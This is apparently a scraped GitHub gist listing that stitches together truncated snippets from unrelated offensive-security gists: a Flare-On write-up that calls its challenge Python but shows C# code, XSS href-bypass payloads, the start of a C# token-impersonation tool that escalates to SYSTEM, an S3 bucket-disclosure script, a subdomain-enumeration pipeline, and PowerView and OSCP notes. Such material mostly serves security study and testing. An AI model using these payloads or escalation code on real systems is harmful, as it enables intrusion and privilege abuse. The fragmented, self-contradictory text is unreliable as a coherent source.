@superfashi
superfashi / flare-on-12-write-up.md
Last active October 26, 2025 13:08
Flare-On 12 Write-Up

Flare-On 12 Write-up

1 - Drill Baby Drill!

We are given a game written in Python. Once again, the source code is given because this is the first and easiest challenge, so let's dig into it directly.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Runtime.Serialization.Formatters.Binary;
namespace hawktracewsus
{
class Program
{
static void Main()
@xiofee
xiofee / 1.Win10ApiSetMap.cpp
Last active April 21, 2025 18:50
Windows 10 GetProcAddress with ApiSet Resolve
// kernel32!GetProcAddress
// kernelbase!GetProcAddress
// ntdll!LdrGetProcedureAddressForCaller
// ntdll!LdrpResolveProcedureAddress
// ntdll!LdrpLoadForwardedDll
// ntdll!LdrpPreprocessDllName
// ntdll!LdrpApplyFileNameRedirection
// ntdll!ApiSetResolveToHost
// ntdll!ApiSetpSearchForApiSet
// ntdll!ApiSetpSearchForApiSetHost
curl -s 'https://crt.sh/?q=%25.DOMAIN_NAME_HERE.com&output=json' \
| jq -r '.[].name_value' \
| sed 's/\*\.//g' \
| sort -u \
| xargs -L1 -I % sh -c './main --ignore-ssl --json="./tmp/%.json" --url="%"'
@ignis-sec
ignis-sec / bb-foxyproxy-pattern.json
Created June 24, 2020 09:06
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
{
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,
@hackerscrolls
hackerscrolls / href_bypass.html
Last active April 14, 2025 08:18
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@mvelazc0
mvelazc0 / GetSystem.cs
Last active February 17, 2025 17:39
Escalates to SYSTEM leveraging OpenProcess, OpenProcessToken and ImpersonateLoggedOnUser. https://attack.mitre.org/beta/techniques/T1134/. Needs to run as a High Integrity proc. Needs SeDebugPrivilege
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
//Based on https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html
namespace GetSystem
{
class Program
{
@colealtdelete
colealtdelete / OSCPStudy.md
Last active September 14, 2025 13:33
List of OSCP Study Resources

(Information provided by @Mod Derek from Security Blue Team Discord from Daniel Durnea on the Offensive Security Facebook page - I am not the original author of this information)

How to prepare for OSCP complete guide

Below are 5 skills which you have to improve before registering for OSCP

  • Learn the basics of Computer Networks, Web applications, and Linux
  • Learn Bash and Python scripting
  • Enumeration is key in the OSCP lab, I repeat Enumeration is key in the OSCP Lab and in the real world too
  • Download vulnerable VM machines from vulnhub
@fransr
fransr / bucket-disclose.sh
Last active October 20, 2025 12:32
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figuring it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happen after it validates that the key exists. we do not need the secret key, only the access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active October 18, 2025 23:58
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set